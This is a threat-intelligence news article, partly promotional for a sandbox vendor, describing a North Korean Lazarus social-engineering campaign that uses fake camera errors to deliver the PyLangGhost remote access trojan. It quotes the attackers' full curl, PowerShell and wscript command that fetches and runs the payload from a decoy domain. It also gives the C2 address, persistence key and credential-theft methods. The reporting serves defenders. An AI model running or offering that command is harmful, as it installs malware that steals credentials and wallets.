Lazarus Hackers Trick Users Into Believing Their Camera or Microphone is Blocked to Deliver PyLangGhost RAT

Cybersecurity researchers have observed a new social engineering campaign attributed to North Korea’s Lazarus Group in recent weeks that leverages fake camera and microphone errors to force targets into running malicious scripts.

Victims, primarily in the finance and technology sectors, report receiving invitations to remote job interviews or technical assessments that abruptly stall, displaying messages claiming their system’s camera or microphone is blocked.

Under the guise of troubleshooting this “error,” unsuspecting users are prompted to execute a seemingly innocuous command, which in reality fetches and deploys a sophisticated Python-based remote access trojan known as PyLangGhost RAT.

Unlike conventional malware delivery methods such as phishing emails or drive-by downloads, this campaign, dubbed “ClickFix” by the attackers, relies on real-time, interactive deception.

The victim’s browser is manipulated into showing endless notifications of a “Race Condition in Windows Camera Discovery Cache” or similar faults, creating urgency and confusion.

Any.Run analysts noted that targets are instructed to paste a multi-part shell command into their terminal or Run dialog, ostensibly to resolve the hardware error.

Instead, this command invisibly pulls down a ZIP archive containing a renamed Python interpreter and leverages VBScript to initiate the core RAT loader.

Empower SOC performance with ANY.RUN Sandbox to Detect Threats Earlier => Try for Free

PyLangGhost RAT represents the latest evolution of Lazarus’s toolset, combining legacy tactics with modern scripting languages. Security teams have traced its development to the Famous Chollima subgroup, which previously employed GoLangGhost RAT.

The Python reimplementation exhibits similar modularity but benefits from Python’s extensive standard library and ease of obfuscation.

Initial VirusTotal detections for the loader binary registered as low as three out of sixty antivirus engines, underscoring the malware’s stealth.

Any.Run researchers identified that once executed, the loader spawns a background process, registers persistence via the Windows registry under the key SoftwareMicrosoftWindowsCurrentVersionRuncsshost, and begins polling its command-and-control (C2) server at raw IP 151.243.101.229 over HTTP.

Infection Mechanism Under the Guise of a Fix

At the heart of PyLangGhost RAT’s distribution is a deceptively simple Windows command. Victims receive instructions to run:-

curl -k -o "%TEMP%nvidiaRelease.zip" https://360scanner.store/cam-v-b74si.fix; `
powershell -Command "Expand-Archive -Force -Path '%TEMP%nvidiaRelease.zip' -DestinationPath '%TEMP%nvidiaRelease'" ; `
wscript "%TEMP%nvidiaReleaseupdate.vbs"

This one-liner downloads a ZIP archive from a decoy domain, forcibly extracts its contents, and silently executes update.vbs.

The VBScript, in turn, decompresses a bundled Lib.zip a legitimate Python environment into the same directory, then launches csshost.exe, a mere alias for Python’s interpreter, to run nvidia.py.

By splitting the VBScript commands across environment variables and hiding windows, the attackers minimize user suspicion.

Behind the scenes, nvidia.py imports auxiliary modules (api.py, command.py, util.py, auto.py) which collectively handle configuration, RC4/MD5 packet encryption, command dispatching, and credential exfiltration.

Persistence is achieved via a registry entry named “csshost,” ensuring the RAT executes on every system reboot.

The malware uniquely targets browser-stored credentials and cryptocurrency wallet extensions such as MetaMask or Coinbase Wallet by escalating privileges and extracting Chrome’s AES master key through DPAPI decryption routines.

In environments running Chrome v20 or later, the RAT impersonates lsass.exe to bypass layered encryption, enabling it to harvest login data uninterrupted.

Network traffic analysis reveals repeated HTTP POST requests to the C2 server, which carry encrypted “qpwoe” packets containing stolen data or await new commands.

By blending real-time social engineering with low-signature Python modules, Lazarus has crafted a campaign that evades both signature-based defenses and casual user scrutiny.

Security teams are urged to monitor outbound connections to unfamiliar IP addresses, enforce application whitelisting, and educate employees on verifying any remote troubleshooting requests before running arbitrary commands.

Continuous behavior-based sandboxing, such as that provided by Any.Run, remains essential to detecting and analyzing this emerging threat in minutes rather than days.

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free